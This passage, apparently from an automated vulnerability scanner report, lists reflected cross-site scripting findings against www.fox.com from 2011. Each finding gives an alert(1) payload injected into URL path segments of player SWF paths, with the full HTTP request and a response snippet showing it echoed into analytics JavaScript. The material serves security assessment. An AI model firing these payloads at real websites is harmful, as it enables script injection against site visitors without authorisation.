The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87182"-alert(1)-"e3a19d2d90d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui87182"-alert(1)-"e3a19d2d90d/fox_player/swf/comScore.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.104
Content-Type: text/html; charset=utf-8
Content-Length: 22185
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui87182"-alert(1)-"e3a19d2d90d:fox_playercomscore"
s_analytics.hier1="fox:shows:_ui87182"-alert(1)-"e3a19d2d90d:fox_playercomscore" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui87182"-alert(1)-"e3a19d2
...[SNIP]...

2.193. http://www.fox.com/_ui/fox_player/swf/comScore.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/comScore.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0837"-alert(1)-"8f1c4dbff1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playerd0837"-alert(1)-"8f1c4dbff1f/swf/comScore.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.108
Content-Type: text/html; charset=utf-8
Content-Length: 22157
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playerd0837"-alert(1)-"8f1c4dbff1fcomscore"
s_analytics.hier1="fox:shows:_ui:fox_playerd0837"-alert(1)-"8f1c4dbff1fcomscore" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playerd0837"-alert(1)-"8f1c4db
...[SNIP]...

2.194. http://www.fox.com/_ui/fox_player/swf/comScore.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/comScore.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b69c9"-alert(1)-"1ffaeaf684d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfb69c9"-alert(1)-"1ffaeaf684d/comScore.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 22045
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfb69c9"-alert(1)-"1ffaeaf684d"
s_analytics.prop15="sub section:comscore" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQ
...[SNIP]...

2.195. http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/flvPlayer.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82a36"-alert(1)-"8535eeb0e17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui82a36"-alert(1)-"8535eeb0e17/fox_player/swf/flvPlayer.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 22189
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui82a36"-alert(1)-"8535eeb0e17:fox_playerflvplayer"
s_analytics.hier1="fox:shows:_ui82a36"-alert(1)-"8535eeb0e17:fox_playerflvplayer" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui82a36"-alert(1)-"8535e
...[SNIP]...

2.196. http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/flvPlayer.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd22"-alert(1)-"0a8d0234e24 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playerfcd22"-alert(1)-"0a8d0234e24/swf/flvPlayer.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.112
Content-Type: text/html; charset=utf-8
Content-Length: 22161
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playerfcd22"-alert(1)-"0a8d0234e24flvplayer"
s_analytics.hier1="fox:shows:_ui:fox_playerfcd22"-alert(1)-"0a8d0234e24flvplayer" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playerfcd22"-alert(1)-"0a8d0
...[SNIP]...

2.197. http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/flvPlayer.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 483f9"-alert(1)-"f82465dc35c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf483f9"-alert(1)-"f82465dc35c/flvPlayer.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.104
Content-Type: text/html; charset=utf-8
Content-Length: 22049
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf483f9"-alert(1)-"f82465dc35c"
s_analytics.prop15="sub section:flvplayer" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.get
...[SNIP]...

2.198. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 211cd"-alert(1)-"d6ea2d832a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui211cd"-alert(1)-"d6ea2d832a9/fox_player/swf/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.108
Content-Type: text/html; charset=utf-8
Content-Length: 22253
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui211cd"-alert(1)-"d6ea2d832a9:fox_playerfoxcomscoreresolverplugin"
s_analytics.hier1="fox:shows:_ui211cd"-alert(1)-"d6ea2d832a9:fox_playerfoxcomscoreresolverplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox
...[SNIP]...

2.199. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26aae"-alert(1)-"ed30504e3ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player26aae"-alert(1)-"ed30504e3ff/swf/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 22225
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player26aae"-alert(1)-"ed30504e3fffoxcomscoreresolverplugin"
s_analytics.hier1="fox:shows:_ui:fox_player26aae"-alert(1)-"ed30504e3fffoxcomscoreresolverplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:
...[SNIP]...

2.200. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxComscoreResolverPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1654d"-alert(1)-"b5c3130e73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf1654d"-alert(1)-"b5c3130e73/foxComscoreResolverPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 22112
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf1654d"-alert(1)-"b5c3130e73"
s_analytics.prop15="sub section:foxcomscoreresolverplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 =
...[SNIP]...

2.201. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c23ae"-alert(1)-"31104e0facb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uic23ae"-alert(1)-"31104e0facb/fox_player/swf/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 22229
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:01 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uic23ae"-alert(1)-"31104e0facb:fox_playerfoxurlsigningplugin"
s_analytics.hier1="fox:shows:_uic23ae"-alert(1)-"31104e0facb:fox_playerfoxurlsigningplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uic2
...[SNIP]...

2.202. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceaf"-alert(1)-"d4d393f6c15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playerbceaf"-alert(1)-"d4d393f6c15/swf/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22201
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playerbceaf"-alert(1)-"d4d393f6c15foxurlsigningplugin"
s_analytics.hier1="fox:shows:_ui:fox_playerbceaf"-alert(1)-"d4d393f6c15foxurlsigningplugin" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playerbc
...[SNIP]...

2.203. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/foxUrlSigningPlugIn.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c78ff"-alert(1)-"da482a500b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfc78ff"-alert(1)-"da482a500b0/foxUrlSigningPlugIn.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
